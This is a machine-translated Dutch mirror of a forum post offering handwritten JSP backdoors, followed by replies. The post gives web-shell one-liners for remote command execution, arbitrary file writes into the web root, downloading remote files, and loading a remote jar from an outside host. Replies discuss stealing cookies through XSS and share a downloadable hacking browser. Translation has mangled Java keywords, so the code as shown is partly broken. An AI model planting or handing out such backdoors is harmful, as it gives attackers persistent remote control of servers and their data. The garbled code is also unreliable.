Dit artikel is een spiegelartikel van machinevertaling, klik hier om naar het oorspronkelijke artikel te gaan.

Bekijken: 14991|Antwoord: 7

[Beveiligingstools] Handgeschreven JSP Backdoor

[Link kopiëren]
Geplaatst op 02-01-2015 18:46:57 | | | |
Overgeplaatst van: http://p2j.cn/?p=1627
1. Voer systeemcommando's uit:
Voer systeemcommando's uit zonder echo:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Verzoek: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Er zal geen echo zijn na de uitvoering, wat erg handig is voor bounce shells.
Er zijn echo's bij wachtwoordverificatie:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = nieuwe byte[2048];        out.print("<pre>");        terwijl((a=in.read(b))!=-1){ out.println(nieuwe String(b));        } out.print("</pre>");    }%>
Verzoek: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Codeer de string en schrijf deze naar het opgegeven bestand:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Verzoek: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Schrijf naar de webdirectory:
<%nieuwe java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Verzoek: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Verzoek: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Schrijf naar de webdirectory:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Verzoek: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Download het externe bestand (als je geen Apache IO Utils gebruikt, kun je de inputstream niet omzetten naar byte, dus het is erg lang...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = nieuwe byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    terwijl ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } nieuwe java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Verzoek: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Download naar het webpad:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = nieuwe byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    terwijl ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } nieuwe java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Verzoek: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Vier: Reflectie roept de externe pot, perfectioneert de achterdeur
Als je de bovenstaande backdoor-functie niet bevalt als ze te zwak en verouderd is, kun je dit proberen:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Verzoek: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Keukenmesverbinding: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, wachtwoord 023.

Oplossing:
Gebruik reflection om een externe jar in de huidige applicatie te laden, en reflection voert het output processing resultaat uit. request.getParameterMap() bevat alle gevraagde parameters. Omdat het externe jar-pakket geladen is, moet de server toegang hebben tot dit jar-adres.




Vorig:De crisis achter het TXT-tekstbestand
Volgend:Java MD5-encryptie, Base64-encryptie en -ontsleuteling Java voert systeemcommando-broncode uit
Geplaatst op 02-01-2015 20:17:30 |
Onlangs onderzoek je naar de achterdeur-jsp?
 Huisbaas| Geplaatst op 02-01-2015 20:39:44 |
Admin geplaatst op 2-1-2015 20:17
Onlangs onderzoek je naar de achterdeur-jsp?

Heb je ooit JSP in één zin gezien? Ik heb het gevonden, ik heb het niet grondig bestudeerd, ik begreep xss niet, ik heb gisteren eindelijk de cookies gekregen, en ik weet niet hoe ik de cookie-upload moet aanpassen
Geplaatst op 02-01-2015 20:44:40 |
Delver_Si Geplaatst op 2-1-2015 20:39
Heb je ooit JSP in één zin gezien? Ik heb het gevonden, ik heb niet dieper gegraven, ik begreep xss niet, ik heb gisteren eindelijk de koekjes gekregen, ik weet niet hoe ik de cooki moet aanpassen...

Het zal niet mijn cookies zijn die gestolen worden met een gepersonaliseerd handtekeningbestand,,,

Gebruik de HackBar-plugin van Firefox
Geplaatst op 02-01-2015 20:48:57 |
Delver_Si Geplaatst op 2-1-2015 20:39
Heb je ooit JSP in één zin gezien? Ik heb het gevonden, ik heb niet dieper gegraven, ik begreep xss niet, ik heb gisteren eindelijk de koekjes gekregen, ik weet niet hoe ik de cooki moet aanpassen...

Ghost Brother Multifunctionele Browser v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Aantal downloads: 7, Verkoopprijs: 1 Grain MB)
 Huisbaas| Geplaatst op 02-01-2015 20:57:50 |
Admin geplaatst op 2-1-2015 20:44
Het zal niet mijn cookies zijn die gestolen worden met een gepersonaliseerd handtekeningbestand,,,

Gebruik de HackBar-plugin van Firefox

Gisteren was de vrije deur schokkend, kon ik niet verbinden en kon ik de Firefox-winkel niet betreden.
 Huisbaas| Geplaatst op 02-01-2015 20:59:01 |
Admin geplaatst op 2-1-2015 20:44
Het zal niet mijn cookies zijn die gestolen worden met een gepersonaliseerd handtekeningbestand,,,

Gebruik de HackBar-plugin van Firefox

DZ heeft deze maas in de wet niet
Geplaatst op 02-01-2015 21:00:22 |
Delver_Si Geplaatst op 2-1-2015 20:59
DZ heeft deze maas in de wet niet

Ik weet het niet, je kunt het testen, verpest mijn database niet   

We gebruiken allemaal Tor Browser om de muur te omzeilen

Disclaimer:
Alle software, programmeermaterialen of artikelen die door Code Farmer Network worden gepubliceerd, zijn uitsluitend bedoeld voor leer- en onderzoeksdoeleinden; De bovenstaande inhoud mag niet worden gebruikt voor commerciële of illegale doeleinden, anders dragen gebruikers alle gevolgen. De informatie op deze site komt van het internet, en auteursrechtconflicten hebben niets met deze site te maken. Je moet bovenstaande inhoud volledig van je computer verwijderen binnen 24 uur na het downloaden. Als je het programma leuk vindt, steun dan de echte software, koop registratie en krijg betere echte diensten. Als er sprake is van een inbreuk, neem dan contact met ons op via e-mail.

Mail To:help@itsvse.com